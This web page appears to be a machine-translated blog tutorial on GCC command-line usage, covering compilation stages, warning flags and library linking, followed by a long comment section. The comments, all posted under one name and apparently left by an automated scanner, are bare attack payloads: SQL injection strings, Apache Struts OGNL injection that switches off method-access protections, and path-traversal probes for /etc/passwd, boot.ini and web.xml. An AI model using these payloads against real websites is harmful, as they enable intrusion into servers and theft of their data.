GCC Common Commands

  • content
  • comment
  • relevant

one brief introduction

GCC It just means GNU C Compiler nothing more. After so many years of development, GCC It can not only support C Language; It also now supports Ada Language C++ Language Java Language Objective C Language Pascal Language COBOL Language, and support for functional programming and logical programming Mercury Language, etc. and GCC It's no longer just GNU C Language compiler means GNU Compiler Collection That is GNU The meaning of compiler family. On the other hand, when it comes to GCC The operating system platform and hardware platform support can be summarized as one sentence: ubiquitous.

two Simple compilation

An example program is as follows:

//test. c

#include <stdio.h>

int main(void)

{

    printf("Hello World!\n");

    return 0;

}

The one-step compilation instructions for this program are :

gcc test.c -o test

In essence, the above compilation process is divided into four stages, namely preprocessing ( Also known as precompiling, Preprocessing) , Compile (Compilation) , Assembly (Assembly) And connections (Linking)

two point one Pretreatment

gcc -E test.c -o test.i or gcc -E test.c

Can output test.i In the file test.c Pre processed code. open test.i Take a look at the document and you will understand. The latter instruction is to directly output the preprocessed code in the command line window .

gcc Of -E Option allows the compiler to stop after preprocessing and output the preprocessing results. In this example, the preprocessing result is stdio.h The contents of the file are inserted into test.c Yes.

two point two Compile as assembly code (Compilation)

After pretreatment, the generated test.i File compilation to generate assembly code:

gcc -S test.i -o test.s

gcc Of -S Option to stop after generating assembly code during program compilation, -o Output assembly code file.

two point three assembly (Assembly)

For the assembly code file generated in the previous section test.s gas The assembler is responsible for compiling them into target files, as follows:

gcc -c test.s -o test.o

two point four connect (Linking)

gcc Connector is gas It is responsible for connecting the object file of the program with all the required additional object files, and finally generating the executable file. Additional object files include static link libraries and dynamic link libraries.

For the generated test.o , connect it with the C standard I/O library, and finally generate the program test

gcc test.o -o test

In the command line window, execute ./test, Let it say HelloWorld Come on!

three Compilation of multiple program files

Generally, the whole program is composed of multiple source files, which correspondingly form multiple compilation units GCC These compilation units can be well managed. Suppose there is a test1.c and test2.c A program composed of two source files. In order to compile them and finally generate an executable program test , you can use the following command:

gcc test1.c test2.c -o test

If more than one file is processed at the same time, GCC The process of preprocessing, compiling, and linking will still be followed. If you dig deeper, the above command is roughly equivalent to executing the following three commands in sequence:

gcc -c test1.c -o test1.o

gcc -c test2.c -o test2.o

gcc test1.o test2.o -o test

four Error detection

gcc -pedantic illcode.c -o illcode

-pedantic Compilation options do not guarantee that the compiled program ANSI/ISO C Fully compatible with the standard, it can only be used to help Linux Programmers are getting closer to this goal. Or in other words, -pedantic Options can help programmers find some nonconformities ANSI/ISO C Standard code, but not all. In fact, only ANSI/ISO C Only those cases that require compiler diagnostics in language standards can be GCC Find and warn.

except -pedantic outside, GCC There are other compilation options that can also produce useful warnings. Most of these options are -W First, the most valuable number -Wall , using it can make GCC Generate as many warnings as possible.

gcc -Wall illcode.c -o illcode

GCC Although the warning information given cannot be regarded as an error in a strict sense, it is likely to become a shelter for errors. An excellent Linux Programmers should try their best to avoid generating warning messages and keep their code standard and robust. Therefore, it is a commendable behavior to treat warning messages as coding errors! So, when compiling the program -Werror Option, then GCC Compilation will be stopped at all warning places, forcing programmers to modify their code, as follows:

gcc -Werror test.c -o test

five Library File Connection

It is rare to develop software without using third-party function libraries at all. Generally speaking, it requires the support of many function libraries to complete the corresponding functions. From the programmer's perspective, function libraries are actually header files( .h )And library files( so , or lib dll )Collection of.. although Linux Most of the functions under the /usr/include/ Directory, and the library files are placed in /usr/lib/ Directory; Windows The library files used are mainly stored in Visual Stido Under the directory of include and lib , and under the system folder. But sometimes, the library we want to use is not under these directories, so GCC When compiling, you must use your own method to find the required header file and library file.

For example, our program test.c Is on linux Use on c connect mysql , we need to go mysql Download on official website MySQL Connectors Of C Library. After downloading and unzipping, there is a include Folder, which contains mysql connectors The header file of lib Folder containing binary so file libmysqlclient.so

among inclulde The path of the folder is /usr/dev/mysql/include,lib Folder is /usr/dev/mysql/lib

five point one Compile to executable file

First, we need to compile test.c It is the target file, which needs to be executed at this time

gcc –c –I /usr/dev/mysql/include test.c –o test.o

five point two link

Finally, we link all the target files into executable files :

gcc –L /usr/dev/mysql/lib –lmysqlclient test.o –o test

Linux The library files under are divided into two categories: dynamic link libraries (usually .so End) and static link libraries (usually .a The only difference between the two is whether the code required for program execution is dynamically loaded at runtime or statically loaded at compile time.

five point three Use static link libraries when forcing links

By default, GCC The dynamic link library is preferred when linking. The static link library is considered only when the dynamic link library does not exist. If necessary, it can be added at compile time -static Option to force the use of static link libraries.

stay /usr/dev/mysql/lib Library files required when there are links in the directory libmysqlclient.so and libmysqlclient.a , in order to GCC When linking, only the static link library is used. You can use the following command :

gcc –L /usr/dev/mysql/lib –static –lmysqlclient test.o –o test

Search path order when linking static libraries:

1. ld I will find GCC Parameters in the command -L
two Look again gcc Environment variables for LIBRARY_PATH
three Find the internal directory again /lib /usr/lib /usr/local/lib This is the beginning compile gcc When written in the program

Search path order during dynamic link and execution :

one Dynamic library search path specified when compiling object code
two
environment variable LD_LIBRARY_PATH Specified dynamic library search path
three
configuration file /etc/ld.so.conf Dynamic library search path specified in
four
Default dynamic library search path /lib
five
Default dynamic library search path /usr/lib

For environment variables:
LIBRARY_PATH
Environment variable: specify the program static link library file search path
LD_LIBRARY_PATH
Environment variable: specify the program dynamic link library file search path

comment

one hundred and eighty-eight Comments
  1.  Gravatar

    angelina reply

    ' AND (SELECT (CASE WHEN (8281=8281) THEN 1 ELSE (SELECT 1 FROM (select 1 union select 2)x) END))-- -1

  2.  Gravatar

    angelina reply

    " , (SELECT (CASE WHEN (8281=8281) THEN 1 ELSE (SELECT 1 FROM (select 1 union select 2)x) END)) )-- -1

  3.  Gravatar

    angelina reply

    1 AND (SELECT 4455 FROM(SELECT COUNT(*),CONCAT(0x3a6469703a,(SELECT (CASE WHEN (4455=4455) THEN 1 ELSE 0 END)),0x3a676e6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a)1

  4.  Gravatar

    angelina reply

    1") AND (SELECT 4455 FROM(SELECT COUNT(*),CONCAT(0x3a6469703a,(SELECT (CASE WHEN (4455=4455) THEN 1 ELSE 0 END)),0x3a676e6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND ("OJPj"="OJPj1

  5.  Gravatar

    angelina reply

    1) AND EXTRACTVALUE(5598,CONCAT(0x5c,0x3a6469703a,(SELECT (CASE WHEN (5598=5598) THEN 1 ELSE 0 END)),0x3a676e6b3a))1

  6.  Gravatar

    angelina reply

    1 AND UPDATEXML(5302,CONCAT(0x2e,0x3a6469703a,(SELECT (CASE WHEN (5302=5302) THEN 1 ELSE 0 END)),0x3a676e6b3a),5475) -- bQcc1

  7.  Gravatar

    angelina reply

    1 AND ROW(1807,6290)>(SELECT COUNT(*),CONCAT(0x3a6469703a,(SELECT (CASE WHEN (1807=1807) THEN 1 ELSE 0 END)),0x3a676e6b3a,FLOOR(RAND(0)*2))x FROM (SELECT 1555 UNION SELECT 5955 UNION SELECT 9086 UNION SELECT 4750)a GROUP BY x)1

  8.  Gravatar

    angelina reply

    -7599) OR (SELECT 5382 FROM(SELECT COUNT(*),CONCAT(0x3a6469703a,(SELECT (CASE WHEN (5382=5382) THEN 1 ELSE 0 END)),0x3a676e6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND (1393=13931

  9.  Gravatar

    angelina reply

    -4743') OR (SELECT 5382 FROM(SELECT COUNT(*),CONCAT(0x3a6469703a,(SELECT (CASE WHEN (5382=5382) THEN 1 ELSE 0 END)),0x3a676e6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND ('BWbY'='BWbY1

  10.  Gravatar

    angelina reply

    -3133" OR (SELECT 5382 FROM(SELECT COUNT(*),CONCAT(0x3a6469703a,(SELECT (CASE WHEN (5382=5382) THEN 1 ELSE 0 END)),0x3a676e6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND "KrbW"="KrbW1

  11.  Gravatar

    angelina reply

    -6804%') OR (SELECT 5382 FROM(SELECT COUNT(*),CONCAT(0x3a6469703a,(SELECT (CASE WHEN (5382=5382) THEN 1 ELSE 0 END)),0x3a676e6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND ('%'='1

  12.  Gravatar

    angelina reply

    -6731 OR (SELECT 5382 FROM(SELECT COUNT(*),CONCAT(0x3a6469703a,(SELECT (CASE WHEN (5382=5382) THEN 1 ELSE 0 END)),0x3a676e6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) -- Gady1

  13.  Gravatar

    angelina reply

    '+(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@ org.apache.struts2.ServletActionContext@getResponse (),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+'

  14.  Gravatar

    angelina reply

    (#context[\"xwork.MethodAccessor.denyMethodExecution\"]=new java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]=new java.lang.Boolean(true),#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@ org.apache.struts2.ServletActionContext@getResponse (),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

  15.  Gravatar

    angelina reply

    (#context['xwork.MethodAccessor.denyMethodExecution']=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@ org.apache.struts2.ServletActionContext@getResponse (),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())(meh)

  16.  Gravatar

    angelina reply

    ../../../../../../../../../../../../../../ etc/passwd

  17.  Gravatar

    angelina reply

    /../../../../../../../../../../../../../../ etc/passwd

  18.  Gravatar

    angelina reply

    //../....//....//....//....//....//....//....//....//....//....//....//....//....//....// etc//passwd

  19.  Gravatar

    angelina reply

    //../..//..//..//..//..//..//..//..//..//..//..//..//..//..// etc//passwd.htm

  20.  Gravatar

    angelina reply

    \..\..\..\..\..\..\..\..\..\..\..\..\..\.. \etc\passwd.php

  21.  Gravatar

    angelina reply

    ../../../../../../../../../../ sbin/../etc/./rc.d/../rc.d/.././rc.local

  22.  Gravatar

    angelina reply

    /../../../../../../../../../../ sbin/../etc/./rc.d/../rc.d/.././rc.local

  23.  Gravatar

    angelina reply

    c:/x/xx/../../../../../../boot.ini.php

  24.  Gravatar

    angelina reply

    data://text/plain ; base64,W0hlbGxvIEFpc2h5XQ==

  25.  Gravatar

    angelina reply

    1%') AND (SELECT 2060 FROM(SELECT COUNT(*),CONCAT(0x3a6f78723a,(SELECT (CASE WHEN (2060=2060) THEN 1 ELSE 0 END)),0x3a7371783a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND ('%'='1

  26.  Gravatar

    angelina reply

    1' AND EXTRACTVALUE(9459,CONCAT(0x5c,0x3a6f78723a,(SELECT (CASE WHEN (9459=9459) THEN 1 ELSE 0 END)),0x3a7371783a))1

  27.  Gravatar

    angelina reply

    1' AND EXTRACTVALUE(9459,CONCAT(0x5c,0x3a6f78723a,(SELECT (CASE WHEN (9459=9459) THEN 1 ELSE 0 END)),0x3a7371783a)) AND 'niMj'='niMj1

  28.  Gravatar

    angelina reply

    1' AND (SELECT 5594 FROM(SELECT COUNT(*),CONCAT(0x3a616e723a,(SELECT (CASE WHEN (5594=5594) THEN 1 ELSE 0 END)),0x3a77686b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND 'pwWC'='pwWC1

  29.  Gravatar

    angelina reply

    1" AND UPDATEXML(6620,CONCAT(0x2e,0x3a6f78723a,(SELECT (CASE WHEN (6620=6620) THEN 1 ELSE 0 END)),0x3a7371783a),8628) AND "hpqF"="hpqF1

  30.  Gravatar

    angelina reply

    1) AND EXTRACTVALUE(9991,CONCAT(0x5c,0x3a616e723a,(SELECT (CASE WHEN (9991=9991) THEN 1 ELSE 0 END)),0x3a77686b3a)) AND (2119=21191

  31.  Gravatar

    angelina reply

    1") AND EXTRACTVALUE(9991,CONCAT(0x5c,0x3a616e723a,(SELECT (CASE WHEN (9991=9991) THEN 1 ELSE 0 END)),0x3a77686b3a)) AND ("NQwm"="NQwm1

  32.  Gravatar

    angelina reply

    1) AND UPDATEXML(1050,CONCAT(0x2e,0x3a616e723a,(SELECT (CASE WHEN (1050=1050) THEN 1 ELSE 0 END)),0x3a77686b3a),2581)1

  33.  Gravatar

    angelina reply

    1%' AND UPDATEXML(1050,CONCAT(0x2e,0x3a616e723a,(SELECT (CASE WHEN (1050=1050) THEN 1 ELSE 0 END)),0x3a77686b3a),2581) AND '%'='1

  34.  Gravatar

    angelina reply

    1) OR EXTRACTVALUE(7027,CONCAT(0x5c,0x3a6f78723a,(SELECT (CASE WHEN (7027=7027) THEN 1 ELSE 0 END)),0x3a7371783a))1

  35.  Gravatar

    angelina reply

    1') OR EXTRACTVALUE(7027,CONCAT(0x5c,0x3a6f78723a,(SELECT (CASE WHEN (7027=7027) THEN 1 ELSE 0 END)),0x3a7371783a)) AND ('eBDY'='eBDY1

  36.  Gravatar

    angelina reply

    1%') OR EXTRACTVALUE(7027,CONCAT(0x5c,0x3a6f78723a,(SELECT (CASE WHEN (7027=7027) THEN 1 ELSE 0 END)),0x3a7371783a)) AND ('%'='1

  37.  Gravatar

    angelina reply

    -4300) OR ROW(2268,5352)>(SELECT COUNT(*),CONCAT(0x3a6f78723a,(SELECT (CASE WHEN (2268=2268) THEN 1 ELSE 0 END)),0x3a7371783a,FLOOR(RAND(0)*2))x FROM (SELECT 7108 UNION SELECT 5805 UNION SELECT 9753 UNION SELECT 5040)a GROUP BY x)1

  38.  Gravatar

    angelina reply

    -5377) OR ROW(2268,5352)>(SELECT COUNT(*),CONCAT(0x3a6f78723a,(SELECT (CASE WHEN (2268=2268) THEN 1 ELSE 0 END)),0x3a7371783a,FLOOR(RAND(0)*2))x FROM (SELECT 7108 UNION SELECT 5805 UNION SELECT 9753 UNION SELECT 5040)a GROUP BY x) AND (6983=69831

  39.  Gravatar

    angelina reply

    -7345') OR ROW(2268,5352)>(SELECT COUNT(*),CONCAT(0x3a6f78723a,(SELECT (CASE WHEN (2268=2268) THEN 1 ELSE 0 END)),0x3a7371783a,FLOOR(RAND(0)*2))x FROM (SELECT 7108 UNION SELECT 5805 UNION SELECT 9753 UNION SELECT 5040)a GROUP BY x) AND ('HpUu'='HpUu1

  40.  Gravatar

    angelina reply

    -7290" OR ROW(2268,5352)>(SELECT COUNT(*),CONCAT(0x3a6f78723a,(SELECT (CASE WHEN (2268=2268) THEN 1 ELSE 0 END)),0x3a7371783a,FLOOR(RAND(0)*2))x FROM (SELECT 7108 UNION SELECT 5805 UNION SELECT 9753 UNION SELECT 5040)a GROUP BY x) AND "Rqme"="Rqme1

  41.  Gravatar

    angelina reply

    -5928%') OR ROW(2268,5352)>(SELECT COUNT(*),CONCAT(0x3a6f78723a,(SELECT (CASE WHEN (2268=2268) THEN 1 ELSE 0 END)),0x3a7371783a,FLOOR(RAND(0)*2))x FROM (SELECT 7108 UNION SELECT 5805 UNION SELECT 9753 UNION SELECT 5040)a GROUP BY x) AND ('%'='1

  42.  Gravatar

    angelina reply

    -2426 OR ROW(2268,5352)>(SELECT COUNT(*),CONCAT(0x3a6f78723a,(SELECT (CASE WHEN (2268=2268) THEN 1 ELSE 0 END)),0x3a7371783a,FLOOR(RAND(0)*2))x FROM (SELECT 7108 UNION SELECT 5805 UNION SELECT 9753 UNION SELECT 5040)a GROUP BY x) -- rQre1

  43.  Gravatar

    angelina reply

    -6326' OR 1 GROUP BY CONCAT(0x3a6f78723a,(SELECT (CASE WHEN (3518=3518) THEN 1 ELSE 0 END)),0x3a7371783a,FLOOR(RAND(0)*2)) HAVING MIN(0)#1

  44.  Gravatar

    angelina reply

    -5184 OR 1 GROUP BY CONCAT(0x3a616e723a,(SELECT (CASE WHEN (3676=3676) THEN 1 ELSE 0 END)),0x3a77686b3a,FLOOR(RAND(0)*2)) HAVING MIN(0)#1

  45.  Gravatar

    angelina reply

    1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL#1

  46.  Gravatar

    angelina reply

    1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#1

  47.  Gravatar

    angelina reply

    1) LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#1

  48.  Gravatar

    angelina reply

    '+(#context['xwork.MethodAccessor.denyMethodExecution']=false,#_memberAccess.allowStaticMethodAccess=true,#_memberAccess.excludeProperties={},#a_str='814F60BD-F6DF-4227-',#b_str='86F5-8D9FBF26A2EB',#a_resp=@ org.apache.struts2.ServletActionContext@getResponse (),#a_resp.getWriter().println(#a_str+#b_str),#a_resp.getWriter().flush(),#a_resp.getWriter().close())+'

  49.  Gravatar

    angelina reply

    ../../../../../../../../../../../../../../ etc/passwd.htm

  50.  Gravatar

    angelina reply

    /../../../../../../../../../../../../../../ etc/passwd.jpg

  51.  Gravatar

    angelina reply

    //../....//....//....//....//....//....//....//....//....//....//....//....//....//....// etc//passwd.php

  52.  Gravatar

    angelina reply

    \..\..\..\..\..\..\..\..\..\..\..\..\..\.. \etc\passwd

  53.  Gravatar

    angelina reply

    \\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\ \etc\\passwd

  54.  Gravatar

    angelina reply

    ../../../../../../../../../../ sbin/../etc/./rc.d/../rc.d/.././rc.local.html

  55.  Gravatar

    angelina reply

    /../../../../../../../../../../ sbin/../etc/./rc.d/../rc.d/.././rc.local.php

  56.  Gravatar

    angelina reply

    x/xx/../../../../../../../../../../../boot.ini

  57.  Gravatar

    angelina reply

    data://text/plain ; base64,W0hlbGxvIEFpc2h5XQ==.html

  58.  Gravatar

    angelina reply

    ' AND (SELECT (CASE WHEN (8281=(select 8282)) THEN 1 ELSE (SELECT 1 FROM (select 1 union select 2)x) END))-- -1

  59.  Gravatar

    angelina reply

    " or 8281=(select 8281 from information_schema.TABLES limit 1) or "8281"="82821

  60.  Gravatar

    angelina reply

    ' , (SELECT (CASE WHEN (8281=8281) THEN 1 ELSE (SELECT 1 FROM (select 1 union select 2)x) END)) )-- -1

  61.  Gravatar

    angelina reply

    " , (SELECT (CASE WHEN (8281-1=8281) THEN 1 ELSE (SELECT 1 FROM (select 1 union select 2)x) END)) )-- -1

  62.  Gravatar

    angelina reply

    1) AND (SELECT 7747 FROM(SELECT COUNT(*),CONCAT(0x3a6177783a,(SELECT (CASE WHEN (7747=7747) THEN 1 ELSE 0 END)),0x3a626b6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND (7027=70271

  63.  Gravatar

    angelina reply

    1" AND (SELECT 7747 FROM(SELECT COUNT(*),CONCAT(0x3a6177783a,(SELECT (CASE WHEN (7747=7747) THEN 1 ELSE 0 END)),0x3a626b6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND "dEnu"="dEnu1

  64.  Gravatar

    angelina reply

    1%' AND (SELECT 9006 FROM(SELECT COUNT(*),CONCAT(0x3a6b64693a,(SELECT (CASE WHEN (9006=9006) THEN 1 ELSE 0 END)),0x3a69766a3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND '%'='1

  65.  Gravatar

    angelina reply

    1) AND EXTRACTVALUE(8966,CONCAT(0x5c,0x3a6b64693a,(SELECT (CASE WHEN (8966=8966) THEN 1 ELSE 0 END)),0x3a69766a3a)) AND (9711=97111

  66.  Gravatar

    angelina reply

    1" AND EXTRACTVALUE(8966,CONCAT(0x5c,0x3a6b64693a,(SELECT (CASE WHEN (8966=8966) THEN 1 ELSE 0 END)),0x3a69766a3a)) AND "GVBz"="GVBz1

  67.  Gravatar

    angelina reply

    1 AND UPDATEXML(2153,CONCAT(0x2e,0x3a6b64693a,(SELECT (CASE WHEN (2153=2153) THEN 1 ELSE 0 END)),0x3a69766a3a),4639)1

  68.  Gravatar

    angelina reply

    1") AND UPDATEXML(2153,CONCAT(0x2e,0x3a6b64693a,(SELECT (CASE WHEN (2153=2153) THEN 1 ELSE 0 END)),0x3a69766a3a),4639) AND ("xdTQ"="xdTQ1

  69.  Gravatar

    angelina reply

    1%' AND ROW(8038,9943)>(SELECT COUNT(*),CONCAT(0x3a6177783a,(SELECT (CASE WHEN (8038=8038) THEN 1 ELSE 0 END)),0x3a626b6b3a,FLOOR(RAND(0)*2))x FROM (SELECT 9694 UNION SELECT 6331 UNION SELECT 1834 UNION SELECT 7658)a GROUP BY x) AND '%'='1

  70.  Gravatar

    angelina reply

    -6894") OR (SELECT 7957 FROM(SELECT COUNT(*),CONCAT(0x3a6177783a,(SELECT (CASE WHEN (7957=7957) THEN 1 ELSE 0 END)),0x3a626b6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND ("vpfo"="vpfo1

  71.  Gravatar

    angelina reply

    -1556%' OR (SELECT 7957 FROM(SELECT COUNT(*),CONCAT(0x3a6177783a,(SELECT (CASE WHEN (7957=7957) THEN 1 ELSE 0 END)),0x3a626b6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA. CHARACTER_SETS GROUP BY x)a) AND '%'='1

  72.  Gravatar

    angelina reply

    1' OR EXTRACTVALUE(7410,CONCAT(0x5c,0x3a6b64693a,(SELECT (CASE WHEN (7410=7410) THEN 1 ELSE 0 END)),0x3a69766a3a))1

  73.  Gravatar

    angelina reply

    1' OR EXTRACTVALUE(7945,CONCAT(0x5c,0x3a6177783a,(SELECT (CASE WHEN (7945=7945) THEN 1 ELSE 0 END)),0x3a626b6b3a)) AND 'HpPF'='HpPF1

  74.  Gravatar

    angelina reply

    1%' OR EXTRACTVALUE(7945,CONCAT(0x5c,0x3a6177783a,(SELECT (CASE WHEN (7945=7945) THEN 1 ELSE 0 END)),0x3a626b6b3a)) AND '%'='1

  75.  Gravatar

    angelina reply

    ../../../../../../../../../../../../../../ etc/passwd.html

  76.  Gravatar

    angelina reply

    /../../../../../../../../../../../../../../ etc/passwd.php

  77.  Gravatar

    angelina reply

    //../..//..//..//..//..//..//..//..//..//..//..//..//..//..// etc//passwd

  78.  Gravatar

    angelina reply

    \..\..\..\..\..\..\..\..\..\..\..\..\..\.. \etc\passwd.htm

  79.  Gravatar

    angelina reply

    \\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\ \etc\\passwd.jpg

  80.  Gravatar

    angelina reply

    ../../../../../../../../../../ sbin/../etc/./rc.d/../rc.d/.././rc.local.jpeg

  81.  Gravatar

    angelina reply

    /../../../../../../../../../../ sbin/../etc/./rc.d/../rc.d/.././rc.local.jpeg

  82.  Gravatar

    angelina reply

    x/xx/../../../../../../../../../../../boot.ini.html

  83.  Gravatar

    angelina reply

    data://text/plain ; base64,W0hlbGxvIEFpc2h5XQ==.htm

  84.  Gravatar

    angelina reply

    ../../../../../../../../../../ etc/rc.d/rc.local

  85.  Gravatar

    angelina reply

    \\..\....\\....\ \WEB-INF\web.xml.jpeg

Post reply

Your email address will not be disclosed. Required items have been used * tagging